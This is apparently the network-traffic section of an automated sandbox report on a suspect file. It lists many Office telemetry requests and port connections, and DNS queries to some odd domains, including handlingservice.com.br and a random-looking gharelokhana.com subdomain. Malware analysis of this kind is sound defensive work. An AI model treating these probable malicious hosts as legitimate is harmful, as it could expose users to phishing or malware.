Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NyhtEpSE923+nrz&MD=EntUVEoZ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: google.dz
Source: global trafficDNS traffic detected: DNS query: www.google.dz
Source: global trafficDNS traffic detected: DNS query: handlingservice.com.br
Source: global trafficDNS traffic detected: DNS query: cjcjjdkdkfkfje.gharelokhana.com
Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 16:51:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
